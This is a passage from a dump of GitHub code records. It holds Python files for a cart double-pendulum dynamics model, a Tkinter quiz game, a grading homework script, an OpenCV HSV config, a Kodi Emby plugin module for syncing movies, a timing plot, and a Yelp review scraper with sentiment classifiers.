(1/2*m1+m2)*L1\nq5 = 1/2*m2*L2\nq6 = 1/2*m2*L1*L2\n\n##########################################################################################################\n# written as D(theta)*theta_dotdot + C(theta, theta_dot)*theta_dot + G(theta) = H*u\n# \n# Constants: m, m1, m2, L1, L2, g, beta, beta1, beta2\n# Letting:\n#   q1 = m + m1 + m2         q3 = 1/3*m2*L2^2        q5 = 1/2*m2*L2\n#   q2 = (1/3*m1+m2)*L1^2    q4 = (1/2*m1+m2)*L1     q6 = 1/2*m2*L1*L2\n# \n# D(theta) = [ q1              q4*cos(theta1)           q5*cos(theta2)        ]\n#            [ q4*cos(theta1)  q2                       q6*cos(theta1-theta2) ]\n#            [ q5*cos(theta2)  q6*cos(theta1-theta2)    q3                    ]\n#\n# C(theta, theta_dot) = [ beta   -q4*theta1_dot*sin(theta1)         -q5*theta2_dot*sin(theta2)       ]\n#                       [ 0      beta1                              q6*theta2_dot*sin(theta1-theta2) ]\n#                       [ 0      -q6*theta1_dot*sin(theta1-theta2)  beta2                            ]\n# \n# G(theta) = [ 0                 ]\n#            [ -g*q4*sin(theta1) ]\n#            [ -g*q5*sin(theta2) ]\n#\n# H = [1]\n#     [0]\n#     [0]\n##########################################################################################################\n
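# Added usage sketch (not part of the original file; the initial state, the time\n# grid and the zero input force below are arbitrary illustrative choices):\n#\n#     from scipy.integrate import odeint\n#     X0 = [0.0, 0.1, -0.1, 0.0, 0.0, 0.0]   # [x, th1, th2, x_dot, th1_dot, th2_dot]\n#     ts = np.linspace(0.0, 10.0, 1001)\n#     sol = odeint(lambda X, t: cart_double_pendulum_model(X, 0.0), X0, ts)\n#\n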
# Function to represent the first-order model\n# X: state vector, expected to be [x, theta1, theta2, x_dot, theta1_dot, theta2_dot]\n# u: input force\ndef cart_double_pendulum_model(X, u):\n    X_prime = np.zeros(6)\n    # print(X)\n    # x = X[0]\n    theta1 = wrap_angle(X[1])\n    theta2 = wrap_angle(X[2])\n    x_dot = X[3]\n    theta1_dot = X[4]\n    theta2_dot = X[5]\n\n    # Theta = np.matrix([x, theta1, theta2]).reshape(3,1)\n    Theta_dot = np.matrix([x_dot, theta1_dot, theta2_dot]).reshape(3,1)\n\n    D = np.array( [[ q1,             q4*cos(theta1),        q5*cos(theta2) ],\n                   [ q4*cos(theta1), q2,                    q6*cos(theta1-theta2) ],\n                   [ q5*cos(theta2), q6*cos(theta1-theta2), q3 ]], dtype=np.float64)\n    Dinv = np.linalg.inv(D) # only really care about inv(D)\n    # print(D)\n    # print(Dinv)\n\n    C = np.array([[ beta, -q4*theta1_dot*sin(theta1),        -q5*theta2_dot*sin(theta2) ],\n                  [ 0,    beta1,                             q6*theta2_dot*sin(theta1-theta2) ],\n                  [ 0,    -q6*theta1_dot*sin(theta1-theta2), beta2 ]], dtype=np.float64)\n\n    G = np.array([[ 0 ],\n                  [ -g*q4*sin(theta1) ],\n                  [ -g*q5*sin(theta2) ]], dtype=np.float64)\n\n    H = np.array([[u],[0],[0]], dtype=np.float64)\n\n    dd = Dinv@H - Dinv@C@Theta_dot - Dinv@G\n\n    # Calculating the derivative\n    X_prime[0] = x_dot\n    X_prime[1] = theta1_dot\n    X_prime[2] = theta2_dot\n    \n    X_prime[3] = dd[0]\n    X_prime[4] = dd[1]\n    X_prime[5] = dd[2]\n    return X_prime\n\n\ndef wrap_angle(angle):\n    return (angle + np.pi) % (2*np.pi) - np.pi","repo_name":"stefantquach/double-pendulum-cart","sub_path":"scripts/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11099399388","text":"from tkinter import *\nfrom tkinter import ttk\n\nroot = Tk()\n\nroot.geometry(\"800x800\")\n\nroot.title(\"Quiz Game App\")\n\nscrollbar = Scrollbar(root)\nscrollbar.pack(side=RIGHT, fill=Y)\n\nlabel = Label(root, text=\"Software Engineering Quiz \",\n              width=28, height=4, font=(\"algerian\", 15))\nlabel.pack()\n\n\nclass Quiz:\n    print('Welcome to the Software Engineering Quiz')\n    score = 0\n    total_questions = 4\n\n    def __init__(self):\n        # self.ask_question()\n        pass\n\n    def ask_question(self):\n        answer = input('Are you ready to play the Quiz ? (yes/no) :')\n\n        if answer.lower() == 'yes':\n            answer = input(\n                'Question 1: What programming language was this quiz created in?')\n            if answer.lower() == 'python':\n                self.score += 1\n                print('correct')\n            else:\n                print('Wrong Answer :(')\n\n            answer = input('Question 2: What is software engineering?')\n            if answer.lower() == 'application of engineering principles to the design of software':\n                self.score += 1\n                print('correct')\n            else:\n                print('Wrong Answer :(')\n\n            answer = input('Question 3: What does SDLC stand for?')\n            if answer.lower() == 'software development life cycle':\n                self.score += 1\n                print('correct')\n            else:\n                print('Wrong Answer :(')\n\n            answer = input(\n                'Question 4: First phase of software development is:')\n            if answer.lower() == 'requirement analysis':\n                self.score += 1\n                print('correct')\n            else:\n                print('Wrong Answer :(')\n\n            print('Thank you for playing the Hacktoberfest quiz game, you attempted',\n                  self.score, \"questions correctly!\")\n            mark = (self.score/self.total_questions)*100\n            print('Marks obtained:', mark)\n            print('BYE!')\n\n    def get_score(self):\n        return self.score\n\n    def validate_question_one(self, question_one_value=''):\n        if question_one_value.lower() == 'python':\n            self.score += 1\n            print('correct')\n        else:\n            print('Wrong Answer1')\n            print('correct answer is python.')\n
        return True if question_one_value.lower() == 'python' else False\n\n    def validate_question_two(self, question_two_value):\n        if question_two_value.lower() == 'application of engineering principles to the design of software':\n            self.score += 1\n            print('correct')\n        else:\n            print('Wrong Answer2')\n            print('correct answer is application of engineering principles to the design of software. It is the application of engineering principles to the design, development, and support of software, and it helps to solve the challenges of low-quality software projects. ')\n        return True if question_two_value.lower() == 'application of engineering principles to the design of software' else False\n\n    def validate_question_three(self, question_three_value):\n        if question_three_value.lower() == 'software development life cycle':\n            self.score += 1\n            print('correct')\n        else:\n            print('Wrong Answer3')\n            print('correct answer is software development life cycle. It is a method for designing, developing, and testing high-quality software.')\n        return True if question_three_value.lower() == 'software development life cycle' else False\n\n    def validate_question_four(self, question_four_value):\n        if question_four_value.lower() == 'requirement analysis':\n            self.score += 1\n            print('correct')\n        else:\n            print('Wrong Answer4')\n            print('correct answer is requirement analysis, as the developer designs and develops the software based on it.')\n        return True if question_four_value.lower() == 'requirement analysis' else False\n\n    def evaluate(self):\n        self.score = 0\n\n        question_one_value = question_one.get()\n        self.validate_question_one(question_one_value=question_one_value)\n\n        question_two_value = question_two.get()\n        self.validate_question_two(question_two_value=question_two_value)\n\n        question_three_value = question_three.get()\n        self.validate_question_three(question_three_value=question_three_value)\n\n        question_four_value = question_four.get()\n        self.validate_question_four(question_four_value=question_four_value)\n\n        print('Thank you for playing the Hacktoberfest quiz game, you attempted',\n              self.score, \"questions correctly!\")\n        mark = (self.score/self.total_questions)*100\n        my_label.config(text=\"Your score is \" + str(mark) + \"%\")\n        print('Marks obtained:', mark)\n\n\nquiz = Quiz()\n\nw1_label = Label(root, text=\"Question 1: What programming language was this quiz created in?\", font=(\n    \"arial\", 10), width=100, height=4)\nw1_label.pack()\nquestion_one = ttk.Combobox(\n    root, value=[\"Python\", \"Java\", \"C++\"], width=50, height=4)\nw1_label.pack()\nquestion_one.current(0)\nquestion_one.pack()\n\nw1_label = Label(root, text=\"\", font=(\"arial\", 10), width=200, height=4)\nw1_label.pack()\n\nw2_label = Label(root, text=\"Question 2: What is software engineering?\", font=(\n    \"arial\", 10), width=200, height=4)\nw2_label.pack()\nquestion_two = ttk.Combobox(root, width=50, height=4, value=[\n    \"Designing a software\", \"Testing a software\", \"Application of engineering principles to the design of software\", \"None of the above\"])\nquestion_two.current(0)\nquestion_two.pack()\n\nw2_label = Label(root, text=\"\", font=(\"arial\", 10), width=200, height=4)\nw2_label.pack()\n\n\nw3_label = Label(root, text=\"Question 3: What does SDLC stand for?\",\n                 font=(\"arial\", 10), width=200, height=4)\nw3_label.pack()\nquestion_three = ttk.Combobox(root, width=50, height=4, value=[\n    \"System Design Life Cycle\", \"Software Design Life Cycle\", \"System Development Life Cycle\", \"Software Development Life Cycle\"])\n
Cycle\"])\nquestion_three.current(0)\nquestion_three.pack()\n\nw3_label = Label(root, text=\"\", font=(\"arial\", 10), width=200, height=4)\nw3_label.pack()\n\nw4_label = Label(root, text=\"Question 4: First phase of software development is:\", font=(\n \"arial\", 10), width=200, height=4)\nw4_label.pack()\nquestion_four = ttk.Combobox(root, width=50, height=4, value=[\n \"Coding\", \"Testing\", \"Design\", \"Requirement ananlysis\"])\nquestion_four.current(0)\nquestion_four.pack()\n\nw4_label = Label(root, text=\"\", font=(\"arial\", 10), width=200, height=4)\nw4_label.pack()\n\n\nbutton = Button(root, text=\"Submit\", font=(\n \"bell mt\", 10), command=quiz.evaluate)\nbutton.pack()\n\n\n# w6_label = Label(root,font=(\"arial\",10),width=100,height=4, textvariable=quiz.get_score())\nmy_label = Label(root,\n text=\"Score:\")\nmy_label.pack()\n\n\nroot.mainloop()\n","repo_name":"larymak/Python-project-Scripts","sub_path":"GAMES/Software-Eng-UI-Quiz/hacktoberfest_quiz.py","file_name":"hacktoberfest_quiz.py","file_ext":"py","file_size_in_byte":6950,"program_lang":"python","lang":"en","doc_type":"code","stars":929,"dataset":"github-code","pt":"77"} +{"seq_id":"30431269995","text":"\"\"\"\nKrom souboru s body si ulož a načti do druhého slovníku ještě soubor bonusy.json. Obsahuje bonusové body získané během semestru. Pozor, bonusové body získali jen někteří žáci.\n\nTvým úkolem je žákům přiřadit známky na základě součtu bodů z písemky a bonusových bodů. Bodová rozhraní (vztahují se na součet) najdeš zde:\n\n1: 90 a více\n2: 70-89\n3: 50-69\n4: 30-49\n5: 29 a méně\n\nVýsledný slovník ulož jako JSON do souboru znamky.json.\n\"\"\"\nimport json\nwith open(\"body.json\", encoding = \"utf-8\") as file:\n body = json.load(file)\n\nwith open(\"bonusy.json\", encoding = \"utf-8\") as file:\n bonusy = json.load(file)\n \nznamky = {}\n\nfor jmeno, body in body.items():\n bonus = 0\n if jmeno in bonusy:\n bonus = bonusy[jmeno]\n body += bonus\n if body >= 90:\n znamka = 1\n elif body >= 70:\n znamka = 2\n elif body >= 50:\n znamka = 3\n elif body >= 30:\n znamka = 4\n else:\n znamka = 5\n znamky[jmeno] = znamka\n \nwith open(\"znamky.json\", mode = \"w\", encoding = \"utf-8\") as file:\n json.dump(znamky, file, ensure_ascii=False, indent=4)","repo_name":"liubakame/reseni_ukolu_python2023","sub_path":"domaci_ukoly/ukol_03/bonusy.py","file_name":"bonusy.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72183264570","text":"import cv2\nimport numpy as np\n\nclass HSVConfig:\n def __init__(self):\n self.h_min = [146]\n self.h_max = [179]\n self.s_min = [110]\n self.s_max = [255]\n self.v_min = [169]\n self.v_max = [255]\n self.hsv_Lower = (self.h_min[0], self.s_min[0], self.v_min[0])\n self.hsv_Upper = (self.h_max[0], self.s_max[0], self.v_max[0])\n\n\n","repo_name":"NoELIEKT/embedded","sub_path":"HSVConfig.py","file_name":"HSVConfig.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34263032314","text":"import xbmc\nfrom . 
import common\n\n\nclass Movies:\n def __init__(self, EmbyServer, embydb, videodb):\n self.EmbyServer = EmbyServer\n self.emby_db = embydb\n self.video_db = videodb\n self.video_db.init_favorite_tags()\n\n def movie(self, item):\n if not common.library_check(item, self.EmbyServer, self.emby_db, \"Movie\"):\n return False\n\n if not common.verify_content(item, \"movie\"):\n return False\n\n xbmc.log(f\"EMBY.core.movies: Process item: {item['Name']}\", 1) # LOGINFO\n ItemIndex = 0\n common.SwopMediaSources(item) # 3D\n item['OriginalTitle'] = item.get('OriginalTitle', \"\")\n item['CommunityRating'] = item.get('CommunityRating', None)\n item['CriticRating'] = item.get('CriticRating', None)\n item['ShortOverview'] = item.get('ShortOverview', \"\")\n item['Settings'] = len(item['Librarys']) * [{}]\n common.set_mpaa(item)\n common.set_trailer(item, self.EmbyServer)\n\n for ItemIndex in range(len(item['Librarys'])):\n if item['KodiItemIds'][ItemIndex]: # existing item\n item['Settings'][ItemIndex] = self.video_db.get_settings(item['KodiFileIds'][ItemIndex])\n self.remove_movie(item['KodiItemIds'][ItemIndex], item['KodiFileIds'][ItemIndex], item['Id'], item['LibraryIds'][ItemIndex])\n\n if not common.get_file_path(item, \"movies\", ItemIndex):\n continue\n\n item['KodiItemIds'][ItemIndex] = self.video_db.create_movie_entry()\n item['KodiFileIds'][ItemIndex] = self.video_db.create_entry_file()\n item['KodiPathId'] = self.video_db.get_add_path(item['Path'], \"movies\")\n common.set_ContentItem(item, self.video_db, self.emby_db, self.EmbyServer, \"movie\", ItemIndex)\n item['Unique'] = self.video_db.add_uniqueids(item['KodiItemIds'][ItemIndex], item['ProviderIds'], \"movie\", 'imdb')\n item['RatingId'] = self.video_db.add_ratings(item['KodiItemIds'][ItemIndex], \"movie\", \"default\", item['CommunityRating'])\n\n if not item['ProductionLocations']:\n item['ProductionLocations'].append(\"\")\n\n self.video_db.add_movie(item['KodiItemIds'][ItemIndex], item['KodiFileIds'][ItemIndex], item['Name'], item['Overview'], item['ShortOverview'], item['Taglines'][0], item['RatingId'], item['Writers'], item['KodiArtwork']['poster'], item['Unique'], item['SortName'], item['RunTimeTicks'], item['OfficialRating'], item['Genre'], item['Directors'], item['OriginalTitle'], item['Studio'], item['Trailer'], item['KodiArtwork']['fanart'].get('fanart', \"\"), item['ProductionLocations'][0], item['Path'], item['KodiPathId'], item['PremiereDate'], item['Filename'], item['DateCreated'], item['UserData']['PlayCount'], item['UserData']['LastPlayedDate'], item['KodiParentIds'][ItemIndex])\n self.emby_db.add_reference(item['Id'], item['KodiItemIds'], item['KodiFileIds'], item['KodiPathId'], \"Movie\", \"movie\", [], item['LibraryIds'], item['ParentId'], item['PresentationUniqueKey'], item['UserData']['IsFavorite'], item['EmbyPath'], None, None, None)\n self.video_db.add_link_tag(common.MediaTags[item['Librarys'][ItemIndex]['Name']], item['KodiItemIds'][ItemIndex], \"movie\")\n self.video_db.set_Favorite(item['UserData']['IsFavorite'], item['KodiItemIds'][ItemIndex], \"movie\")\n self.video_db.add_genres_and_links(item['Genres'], item['KodiItemIds'][ItemIndex], \"movie\")\n\n if item['CriticRating']:\n item['CriticRating'] = float(item['CriticRating'] / 10.0)\n self.video_db.add_ratings(item['KodiItemIds'][ItemIndex], \"movie\", \"tomatometerallcritics\", item['CriticRating'])\n\n self.video_db.add_tags_and_links(item['KodiItemIds'][ItemIndex], \"movie\", item['TagItems'])\n self.emby_db.add_multiversion(item, \"Movie\", 
self.EmbyServer.API, self.video_db, ItemIndex)\n\n if item['Settings'][ItemIndex]:\n self.video_db.add_settings(item['KodiFileIds'][ItemIndex], item['Settings'][ItemIndex])\n\n # Add Special features\n if 'SpecialFeatureCount' in item:\n if int(item['SpecialFeatureCount']):\n SpecialFeatures = self.EmbyServer.API.get_specialfeatures(item['Id'])\n\n for SF_item in SpecialFeatures:\n eSF_item = self.emby_db.get_item_by_id(SF_item['Id'])\n common.get_streams(SF_item)\n SF_item['ParentId'] = item['Id']\n SF_item['Library'] = item['Library']\n SF_item['ServerId'] = item['ServerId']\n SF_item['KodiFileIds'] = item['KodiFileIds']\n SF_item['KodiItemIds'] = item['KodiItemIds']\n SF_item['LibraryIds'] = item['LibraryIds']\n SF_item['IntroStartPositionTicks'] = None\n SF_item['IntroEndPositionTicks'] = None\n SF_item['CreditsPositionTicks'] = None\n common.SwopMediaSources(SF_item) # 3D\n common.get_file_path(SF_item, \"movies\", ItemIndex)\n\n if not SF_item['FullPath']: # Invalid Path\n xbmc.log(f\"EMBY.core.movies: Invalid path: {SF_item['Id']}\", 3) # LOGERROR\n xbmc.log(f\"EMBY.core.movies: Invalid path: {SF_item}\", 0) # LOGDEBUG\n return False\n\n SF_item['KodiItemIds'][ItemIndex] = None\n SF_item['KodiFileIds'][ItemIndex] = None\n SF_item['KodiPathId'] = None\n\n if not eSF_item:\n self.emby_db.add_reference(SF_item['Id'], [], [], None, \"SpecialFeature\", None, [], item['LibraryIds'], item['Id'], SF_item['PresentationUniqueKey'], SF_item['UserData']['IsFavorite'], SF_item['EmbyPath'], None, None, None)\n xbmc.log(f\"EMBY.core.movies: ADD SpecialFeature {SF_item['Id']}: {SF_item['Name']}\", 1) # LOGINFO\n\n self.emby_db.add_streamdata(SF_item['Id'], SF_item['Streams'])\n\n if item['UpdateItems'][ItemIndex]:\n xbmc.log(f\"EMBY.core.movies: UPDATE movie [{item['KodiPathId']} / {item['KodiFileIds'][ItemIndex]} / {item['KodiItemIds'][ItemIndex]}] {item['Id']}: {item['Name']}\", 1) # LOGINFO\n else:\n xbmc.log(f\"EMBY.core.movies: ADD movie [{item['KodiPathId']} / {item['KodiFileIds'][ItemIndex]} / {item['KodiItemIds'][ItemIndex]}] {item['Id']}: {item['Name']}\", 1) # LOGINFO\n\n return not item['UpdateItems'][ItemIndex]\n\n def boxset(self, item):\n if not common.library_check(item, self.EmbyServer, self.emby_db, \"BoxSet\"):\n return False\n\n MoviesAssignedToBoxset = self.EmbyServer.API.get_Items(item['Id'], [\"Movie\", \"Video\"], True, False, {})\n\n for ItemIndex in range(len(item['Librarys'])):\n common.set_overview(item)\n\n if item['UpdateItems'][ItemIndex]:\n self.video_db.common.delete_artwork(item['KodiItemIds'][ItemIndex], \"set\")\n self.video_db.update_boxset(item['Name'], item['Overview'], item['KodiItemIds'][ItemIndex])\n else:\n xbmc.log(f\"EMBY.core.movies: SetId {item['Id']} not found\", 0) # LOGDEBUG\n item['KodiItemIds'][ItemIndex] = self.video_db.add_boxset(item['Name'], item['Overview'])\n\n # BoxSets\n CurrentBoxSetMovies = self.emby_db.get_item_by_parent_id(item['KodiItemIds'][ItemIndex], \"movie\")\n\n if CurrentBoxSetMovies:\n CurrentBoxSetMovies = dict(CurrentBoxSetMovies)\n else:\n CurrentBoxSetMovies = {}\n\n for MovieAssignedToBoxset in MoviesAssignedToBoxset:\n MovieID = int(MovieAssignedToBoxset['Id'])\n\n if MovieID not in CurrentBoxSetMovies:\n Data = self.emby_db.get_item_by_id(MovieAssignedToBoxset['Id'])\n\n if not Data:\n xbmc.log(f\"EMBY.core.movies: Failed to process {MovieAssignedToBoxset['Name']} to boxset\", 1) # LOGINFO\n continue\n\n self.video_db.set_boxset(item['KodiItemIds'][ItemIndex], Data[0])\n KodiItemIds = len(Data[6].split(\";\")) * 
[str(item['KodiItemIds'][ItemIndex])] # Data[6] -> EmbyLibraryId\n                    KodiItemIds = \";\".join(KodiItemIds)\n                    self.emby_db.update_parent_id(KodiItemIds, MovieAssignedToBoxset['Id'])\n                    xbmc.log(f\"EMBY.core.movies: ADD to boxset [{item['KodiItemIds'][ItemIndex]} / {Data[0]}] {MovieAssignedToBoxset['Name']}: {MovieAssignedToBoxset['Id']} to boxset\", 1) # LOGINFO\n                else:\n                    del CurrentBoxSetMovies[MovieID]\n\n            for EmbyMovieId in CurrentBoxSetMovies:\n                self.video_db.remove_from_boxset(CurrentBoxSetMovies[EmbyMovieId])\n                self.emby_db.update_parent_id(None, EmbyMovieId)\n                xbmc.log(f\"EMBY.core.movies: DELETE from boxset [{item['Id']}] {item['KodiItemIds'][ItemIndex]} {item['Name']}: {CurrentBoxSetMovies[EmbyMovieId]}\", 1) # LOGINFO\n\n            common.set_KodiArtwork(item, self.EmbyServer.ServerData['ServerId'], False)\n            self.video_db.common.add_artwork(item['KodiArtwork'], item['KodiItemIds'][ItemIndex], \"set\")\n            self.emby_db.add_reference(item['Id'], item['KodiItemIds'], [], None, \"BoxSet\", \"set\", [], item['LibraryIds'], None, item['PresentationUniqueKey'], item['UserData']['IsFavorite'], None, None, None, None)\n            xbmc.log(f\"EMBY.core.movies: UPDATE boxset [{item['Id']}] {item['KodiItemIds'][ItemIndex]} {item['Name']}\", 1) # LOGINFO\n\n        return True\n\n    # This updates: Favorite, LastPlayedDate, Playcount, PlaybackPositionTicks\n    def userdata(self, Item):\n        if not common.library_check(Item, self.EmbyServer, self.emby_db):\n            return\n\n        if Item['PlaybackPositionTicks'] and Item['PlayedPercentage']:\n            RuntimeSeconds = int(Item['PlaybackPositionTicks'] / Item['PlayedPercentage'] / 100000)\n        else:\n            RuntimeSeconds = 0\n\n        common.set_playstate(Item)\n\n        for ItemIndex in range(len(Item['Librarys'])):\n            self.video_db.set_Favorite(Item['IsFavorite'], Item['KodiItemIds'][ItemIndex], \"movie\")\n            self.video_db.update_bookmark_playstate(Item['KodiFileIds'][ItemIndex], Item['PlayCount'], Item['LastPlayedDate'], Item['PlaybackPositionTicks'], RuntimeSeconds)\n            self.emby_db.update_favourite(Item['IsFavorite'], Item['Id'])\n            xbmc.log(f\"EMBY.core.movies: New resume point {Item['Id']}: {Item['PlaybackPositionTicks']}\", 0) # LOGDEBUG\n            xbmc.log(f\"EMBY.core.movies: USERDATA [{Item['KodiFileIds'][ItemIndex]} / {Item['KodiItemIds'][ItemIndex]}] {Item['Id']}\", 1) # LOGINFO\n\n    def remove(self, Item):\n        if Item['Type'] == 'Movie':\n            self.remove_movie(Item['KodiItemId'], Item['KodiFileId'], Item['Id'], Item['Library']['Id'])\n\n            if not Item['DeleteByLibraryId']:\n                StackedIds = self.emby_db.get_stacked_embyid(Item['PresentationUniqueKey'], Item['Library']['Id'], \"Movie\")\n\n                if StackedIds: # multi version\n                    xbmc.log(f\"EMBY.core.movies: DELETE multi version movies from embydb {Item['Id']}\", 1) # LOGINFO\n\n                    for StackedId in StackedIds:\n                        StackedItem = self.EmbyServer.API.get_Item(StackedId[0], ['Movie'], False, False)\n\n                        if StackedItem:\n                            StackedItem['Library'] = Item['Library']\n                            xbmc.log(f\"EMBY.core.movies: UPDATE remaining multi version movie {StackedItem['Id']}\", 1) # LOGINFO\n                            self.movie(StackedItem) # update all remaining multiversion items\n                        else:\n                            self.emby_db.remove_item(StackedId[0], Item['Library']['Id'])\n        elif Item['Type'] == 'BoxSet':\n            self.remove_boxset(Item['KodiItemId'], Item['KodiFileId'], Item['Id'], Item['Library']['Id'])\n        elif Item['Type'] == 'SpecialFeature':\n            self.remove_specialfeature(Item['Id'], Item['Library']['Id'])\n\n    def remove_specialfeature(self, EmbyItemId, EmbyLibraryId):\n        self.emby_db.remove_item(EmbyItemId, EmbyLibraryId)\n        xbmc.log(f\"EMBY.core.movies: DELETE specialfeature 
{EmbyItemId}\", 1) # LOGINFO\n\n def remove_movie(self, KodiItemId, KodiFileId, EmbyItemId, EmbyLibraryId):\n common.delete_ContentItem(EmbyItemId, KodiItemId, KodiFileId, self.video_db, self.emby_db, \"movie\", EmbyLibraryId)\n self.video_db.delete_movie(KodiItemId, KodiFileId)\n xbmc.log(f\"EMBY.core.movies: DELETE movie [{KodiItemId} / {KodiFileId}] {EmbyItemId}\", 1) # LOGINFO\n\n def remove_boxset(self, KodiId, KodiFileId, EmbyItemId, EmbyLibrayId):\n for movie in self.emby_db.get_item_by_parent_id(KodiId, \"movie\"):\n self.video_db.remove_from_boxset(movie[1])\n self.emby_db.update_parent_id(None, movie[0])\n\n self.video_db.common.delete_artwork(KodiId, \"set\")\n self.video_db.delete_boxset(KodiId)\n self.emby_db.remove_item(EmbyItemId, EmbyLibrayId)\n xbmc.log(f\"EMBY.core.movies: DELETE boxset [{KodiId} / {KodiFileId}] {EmbyItemId}\", 1) # LOGINFO\n","repo_name":"MediaBrowser/plugin.video.emby","sub_path":"core/movies.py","file_name":"movies.py","file_ext":"py","file_size_in_byte":13353,"program_lang":"python","lang":"en","doc_type":"code","stars":278,"dataset":"github-code","pt":"77"} +{"seq_id":"35139558121","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\nx = np.array([1e6, 3e6, 6e6, 1e7, 3e7, 6e7, 1e8])\ncputimes = np.array([50.0, 147.0, 293.0, 491.0, 1473.0, 3005.0, 4977.0])\ngputimes = np.array([3.72244, 4.24126, 4.71751, 5.69286, 8.8244, 14.7054, 21.627])\n\nfig, ax1 = plt.subplots()\nax2 = ax1.twinx()\n\nax1.plot(x, gputimes, \".-\", color=\"#FF0000\", linewidth=2.5, markersize=7.5)\nax1.set_xlabel(\"Number of Neutrons\", fontsize=22)\nax1.set_ylabel(\"McVineGPU Execution Time (s)\", color=\"#FF0000\", fontsize=22)\nax1.set_ylim(0, 25)\nax1.tick_params(\"x\", labelsize=18)\nax1.tick_params(\"y\", colors=\"#FF0000\", labelsize=18)\n\nax2.plot(x, cputimes, \".-\", color=\"#0000FF\", linewidth=2.5, markersize=7.5)\nax2.set_ylabel(\"MCViNE Execution Time (s)\", color=\"#0000FF\", fontsize=22)\nax2.tick_params(\"y\", colors=\"#0000FF\", labelsize=18)\n\nfig.suptitle(\"Timing Comparison of MCViNE vs McVineGPU\", y=0.95, fontsize=24)\n\nplt.show()\n","repo_name":"mcvine/McVineGPU","sub_path":"python/timingGraph.py","file_name":"timingGraph.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71507931770","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[88]:\n\n\nimport numpy as np\nimport pandas as pd\nimport json\nimport requests\n# import sys\n# import io\n\n\n# ## set the http-headers\n\n# In[89]:\n\n\nua=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\" \nheaders={\"User-Agent\":ua} #environment setting\n\n\n# \n\n# In[90]:\n\n\nreviews=[]\nscores=[]\nscoresd={}\ndef get_review_content(baseurl,start,end):\n \n for i in range(start,end,10):\n url=baseurl + \"&start={}\".format(i)\n resp = requests.get(url,headers=headers)\n jsnStr=json.loads(resp.text)\n if(len(jsnStr['reviews'])==0):\n print(\"no more comments, stopping\")\n break\n for review in jsnStr['reviews']:\n text=review['comment']['text']\n score=review[\"rating\"]\n #print(json.dumps(review,indent=2))\n text=text.replace(\"'\",\"_\").replace(\"
\",\"\")\n reviews.append(text)\n scores.append(score)\n if(score not in scoresd):\n scoresd[score]=0\n scoresd[score]+=1\n return 'crawling finished'\n\n\n# In[91]:\n\n\nburl=\"https://www.yelp.com/biz/FH978pIP1TLRuPAH-MbWIQ/review_feed?rl=en&q=&sort_by=rating_asc\"\nburl2=\"https://www.yelp.com/biz/EGS6y6WsPkNs8PZ2X6bHOA/review_feed?rl=en&q=&sort_by=relevance_desc\"\nget_review_content(burl2,0,1000)\n\n\n# In[92]:\n\n\n# # take a look on example data\nexample_index=0\nprint(\"review: {}\".format(reviews[example_index]))\nprint(\"score: {}\".format(scores[example_index]))\n\nprint(scoresd) # see how the score distributed\n\n\n# In[108]:\n\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n# vectorizer = CountVectorizer(max_df=0.8,min_df=0.15)\nvectorizer = TfidfVectorizer(max_df=0.8,min_df=0.15)\n\nvectorizer.fit(reviews)\nX=vectorizer.transform(reviews)#result in sparse matrix\n\n\n# In[94]:\n\n\ny=[] # if score less or equal to 3, we will assign it to 0 which mean bad review,otherwise we will assign it to 1 which means good review\nfor i in range(len(scores)):\n if(scores[i]<=3):\n y.append(0)\n\n else:\n y.append(1)\n\n\n# In[95]:\n\n\nprint(X.todense()[0])\nprint('----')\nprint(X[0])\nprint(X.shape)\nprint(reviews[0])\nprint(len(reviews))\nprint(len(reviews[0]))\nprint(vectorizer.get_feature_names())\nprint(len(y))\n\n\n# In[96]:\n\n\nfrom sklearn.model_selection import train_test_split\nX_train,X_test,y_train,y_test = train_test_split(X.todense(),y,test_size=0.21,random_state=42) #split the data to train set and test set\nprint(X_train.shape)\nprint(X_test.shape)\nprint(y_test)\n\n\n# In[97]:\n\n\nfrom sklearn.linear_model import LogisticRegression\n\nmodel = LogisticRegression()\n\nmodel.fit(X_train, y_train)\nprint(\"training done.\")\n\n\n# In[98]:\n\n\ny_pred = model.predict(X_test)\nprint(y_pred)\n\n\n# In[99]:\n\n\nfrom sklearn.metrics import classification_report\n\nr = classification_report(y_test,y_pred)\nprint(r)\n\n\n# In[100]:\n\n\nfrom sklearn import svm\nfrom sklearn.preprocessing import StandardScaler\n\n\n#regularization\nsc = StandardScaler()\n\nxtrain = sc.fit_transform(X_train)\nxtest = sc.transform(X_test)\n\n\n# In[101]:\n\n\nmodel = svm.SVC()\nmodel.fit(xtrain, y_train)\ny_pred = model.predict(xtest)\nprint(y_pred)\nr = classification_report(y_test,y_pred)\nprint(r)\n\n\n# In[102]:\n\n\nfrom sklearn import tree\ntr = tree.DecisionTreeClassifier()\ntr.fit(X_train, y_train)\nprint(\"training done.\")\n\n\n# In[103]:\n\n\ntree_predict = tr.predict(X_test)\nprint(tree_predict)\nrc = classification_report(y_test,tree_predict)\nprint(rc)\n\n\n# In[104]:\n\n\nfrom sklearn.ensemble import GradientBoostingClassifier\ngdb = GradientBoostingClassifier() #取长补短\ngdb.fit(X_train, y_train)\nprint(\"training done.\")\n\n\n# In[105]:\n\n\ngdb_pred = gdb.predict(X_test)\ngdb_report = classification_report(y_test,gdb_pred)\nprint(gdb_report)\n\n\n# In[106]:\n\n\nimport lightgbm as lgb\nrng = lgb.LGBMClassifier()\nrng.fit(X_train, y_train)\nprint('training done')\n\n\n# In[107]:\n\n\nrng_pred = rng.predict(X_test)\nrng_report = classification_report(y_test,rng_pred)\nprint(rng_report)\n\n\n# In[ 